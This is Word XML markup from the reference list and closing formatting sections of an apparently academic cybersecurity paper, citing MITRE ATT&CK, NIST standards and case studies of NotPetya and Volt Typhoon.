            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E766F" w14:textId="1C169F98"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[10] MITRE</w:t>
      </w:r>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2024, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ATT&amp;CK Data Sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Available at:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId64">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/datasources/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6242A3" w14:textId="3727A1B8" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00112949"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[11] MITRE 2025, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, Software S0368</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Available at:</w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/software/S0368/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A3378A" w14:textId="4B233928"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[1</w:t>
      </w:r>
      <w:r w:rsidR="00421EBC" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">] National Institute of Standards and Technology NIST 2020, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Zero Trust Architecture (SP 800-207)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, NIST. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidRPr="00B40682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B96782E" w14:textId="0B27545C"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[12] National Institute of Standards and Technology NIST 2020, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NIST Special Publication 800-53 Rev. 5: Security and Privacy Controls for Information Systems and Organizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Available at:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D6EC1" w14:textId="27725B39"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[13] National Institute of Standards and Technology NIST 2025, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Authenticator and Verifier Requirements (SP 800-63B)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId68">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://pages.nist.gov/800-63-4/sp800-63b/authenticators/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEA745" w14:textId="489D5493"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[14] Steinberg, S, Stepan, A and Neary, K 2021, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: A Columbia University Case Study</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, SIPA-21-022.1, Columbia University School of International and Public Affairs. Available at:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId69">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.sipa.columbia.edu/sites/default/files/2022-11/NotPetya%20Final.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC3F502" w14:textId="360A9C74" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="007E57E5" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[15] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Uchill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, J 2018, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">White House confirms </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was a Russian cyberattack</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, Axios. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId70">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.axios.com/2018/02/15/white-house-confirms-notpetya-1518728781</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF8F73" w14:textId="77777777" w:rsidR="00E1416F" w:rsidRPr="00B40682" w:rsidRDefault="00E1416F" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E1416F" w:rsidRPr="00B40682" w:rsidSect="00C4327F">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9B19C7" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB81C5E" w14:textId="77777777" w:rsidR="00D04F5C" w:rsidRDefault="00D04F5C" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D04F5C" w:rsidSect="00C4327F">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B38CF26" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00AF28EE" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidSect="00C4327F">
      <w:type w:val="continuous"/>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16495" w14:textId="77777777" w:rsidR="002D3031" w:rsidRDefault="002D3031" w:rsidP="007D6DE3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0EBE4999" w14:textId="77777777" w:rsidR="002D3031" w:rsidRDefault="002D3031" w:rsidP="007D6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93FD9B3A-6A9C-4095-923E-3273BE316EEA}"/>
    <w:embedBold r:id="rId2" w:fontKey="{FD56F127-449B-44AB-A618-BE392ADDE636}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{EDCFFDBB-A3B4-4645-8397-9F2A049F61F0}"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:panose1 w:val="020F0302020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C200247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
    <w:embedRegular r:id="rId4" w:fontKey="{D6B7FA2B-AB1C-48DA-B6AD-1922B15312DC}"/>
  </w:font>
  <w:font w:name="Cardo">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:embedRegular r:id="rId5" w:fontKey="{51FB1338-FABE-4F12-8BA4-4AD46B0352BF}"/>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439504"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="4AAF1302" w14:textId="27E30D30" w:rsidR="00D04F5C" w:rsidRDefault="00D04F5C">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r w:rsidRPr="00D04F5C">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00D04F5C">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00D04F5C">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00D04F5C">
          <w:rPr>
            <w:noProof/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00D04F5C">
          <w:rPr>
            <w:noProof/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="50238CA1" w14:textId="77777777" w:rsidR="007D6DE3" w:rsidRDefault="007D6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54CD3" w14:textId="77777777" w:rsidR="002D3031" w:rsidRDefault="002D3031" w:rsidP="007D6DE3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="75D91979" w14:textId="77777777" w:rsidR="002D3031" w:rsidRDefault="002D3031" w:rsidP="007D6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31059"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99F23E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72418A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1728AF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7B694A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="047E98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833456"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6F267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2C78C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71E26F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1E82E20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="868E5A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6BB2DE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02A86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2203AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D152D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6037857"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE7A5774"/>
    <w:lvl w:ilvl="0" w:tplc="1396B73C">
      <w:start w:val="1"/>
      <w:numFmt w:val="upp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4572384">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="25568602">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="831338119">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1749496292">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1454204232">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="290938961">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2121870382">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1717510323">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="20761245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28EE"/>
    <w:rsid w:val="00004782"/>
    <w:rsid w:val="0005307B"/>
    <w:rsid w:val="00072E1F"/>
    <w:rsid w:val="000C7B7A"/>
    <w:rsid w:val="00112949"/>
    <w:rsid w:val="001362FA"/>
    <w:rsid w:val="00220265"/>
    <w:rsid w:val="00261172"/>
    <w:rsid w:val="002D3031"/>
    <w:rsid w:val="002D7089"/>
    <w:rsid w:val="00356B42"/>
    <w:rsid w:val="0037435E"/>
    <w:rsid w:val="003A76B3"/>
    <w:rsid w:val="003B0BF9"/>
    <w:rsid w:val="003C1EBA"/>
    <w:rsid w:val="003D06AB"/>
    <w:rsid w:val="00421EBC"/>
    <w:rsid w:val="00445BC4"/>
    <w:rsid w:val="0056631F"/>
    <w:rsid w:val="00617061"/>
    <w:rsid w:val="00656352"/>
    <w:rsid w:val="00675181"/>
    <w:rsid w:val="006847FF"/>
    <w:rsid w:val="006C47BD"/>
    <w:rsid w:val="006D0E2B"/>
    <w:rsid w:val="006D2DE4"/>
    <w:rsid w:val="007D6DE3"/>
    <w:rsid w:val="007E57E5"/>
    <w:rsid w:val="00800D31"/>
    <w:rsid w:val="00827135"/>
    <w:rsid w:val="008A2BE7"/>
    <w:rsid w:val="0093184D"/>
    <w:rsid w:val="009D577C"/>
    <w:rsid w:val="00A018D7"/>
    <w:rsid w:val="00A07E3A"/>
    <w:rsid w:val="00A60841"/>
    <w:rsid w:val="00AF28EE"/>
    <w:rsid w:val="00B13216"/>
    <w:rsid w:val="00B40682"/>
    <w:rsid w:val="00B96FF4"/>
    <w:rsid w:val="00BF0AEB"/>
